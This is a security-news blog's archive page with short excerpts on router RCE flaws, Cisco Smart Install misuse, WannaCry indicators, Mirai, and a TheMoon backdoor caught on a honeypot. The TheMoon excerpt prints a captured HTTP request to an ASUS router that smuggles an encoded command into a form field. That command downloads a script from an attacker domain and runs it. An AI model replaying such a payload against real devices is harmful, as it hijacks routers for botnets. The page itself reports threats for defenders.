Category Archives: Security News

D-Link DIR-850L – Unauthenticated OS Command Execution Vulnerability RCE Router

D-Link DIR-850L suffers from a serious vulnerability allowing for OS command execution, if you have this version of D-Link it is highly recommended that you upgrade the firmware immediately and firewall off all access to this device. This will not help you prevent insider threats but will stop the masses from locating and owning your… Read More »

Share Button

HUGE VULNERABILITY Remote Code Execution Possible with Cisco Smart Install Protocol Misuse

. Technical Details Smart Install is a plug-and-play configuration and image-management feature that provides zero-touch deployment for new switches. The Smart Install feature incorporates no authentica-tion by design. SmartInstall also has mechanisms in place for subsequent Cisco IOS Software and configura-tion upgrades on groups of switches, using a single command line interface (CLI) and switch… Read More »

Share Button

Wcry WannaCry WCry Ransomware Malware ETERNALBLUE/MS17-010 Worm is dead or is it? – active new IOCs Domain Names/IPs

Ransomware is nothing new, since 2012 it has been wreaking havoc on the world. The TTPs for delivering and infecting victims has changed over the years but the end goal remains the same, give me your money or you’ll never see your files again. Some of the first ransomware campaigns used mechanisms such as exploit… Read More »

Share Button

New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux Backdoor found in the wild on one of our honeypots – This bot belongs to the TheMoon family of malware The vulnerable ASUS router will  download and execute the binary file .nttpd from the attacker controlled website. POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host: 81.171.12.232\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1′ https://virustotal.com/en/file/b963223d3f39884ebed3e647390e55d8de86c7e3c5daaae6509379a6fc3ba97e/analysis/1489518585/ Antivirus… Read More »

Share Button

Mirai Internet of Things IoT DDoS sets record 600+ GB/Sec and your refrigerator could have been one of the attackers!

What is the Internet of Things (IoT) ? In today’s technological expansion everything seems to be connected to the Internet, for instance in my own home I have my refrigerator, thermostat, video cameras, tablets, cell phone, TV, xbox, DirecTV box, printer, security system, laptops, servers, workstations, Ethernet tap, a switch and a router all connected… Read More »

Share Button